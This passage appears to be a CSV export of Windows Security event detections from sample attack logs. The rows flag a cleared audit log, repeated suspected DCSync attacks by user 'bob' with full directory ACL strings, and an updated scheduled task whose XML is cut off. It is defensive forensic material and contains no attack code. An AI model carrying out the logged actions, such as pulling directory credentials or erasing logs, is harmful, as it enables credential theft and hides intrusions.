07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;
;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"
1102
0
4
104
0
0x4020000000000000
25048
Security
alice.insecurebank.local
S-1-5-21-1005675359-741490361-30848483-1108
bob
insecurebank
0x1c363a4
",alice.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242601
Security
DC1.insecurebank.local
8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;
;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242600
Security
DC1.insecurebank.local
8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242599
Security
DC1.insecurebank.local
77B63738-C25C-4FBD-BA96-A7ABE17A22A3
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242598
Security
DC1.insecurebank.local
77B63738-C25C-4FBD-BA96-A7ABE17A22A3
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,scheduled task updated by user,4702,"
4702
0
0
12804
0
0x8020000000000000
2171293
Security
01566s-win16-ir.threebeesco.com
S-1-5-21-308926384-506822093-3341789130-1106
a-jbrown
3B
0x21a8c68
\LMST
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2020-09-02T04:47:49.74-07:00</Date>
<Author>a-jbrown</Author>
<Description>00304d6e</Description>
<URI>\LMST</URI>
</RegistrationInfo>
<Triggers>
<TimeTrigger>
<StartBoundary>2020-02-09T04:47:48</StartBoundary>
<EndBoundary>2020-02-09T04:47:58</EndBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<RunLevel>HighestAvailable</RunLevel>
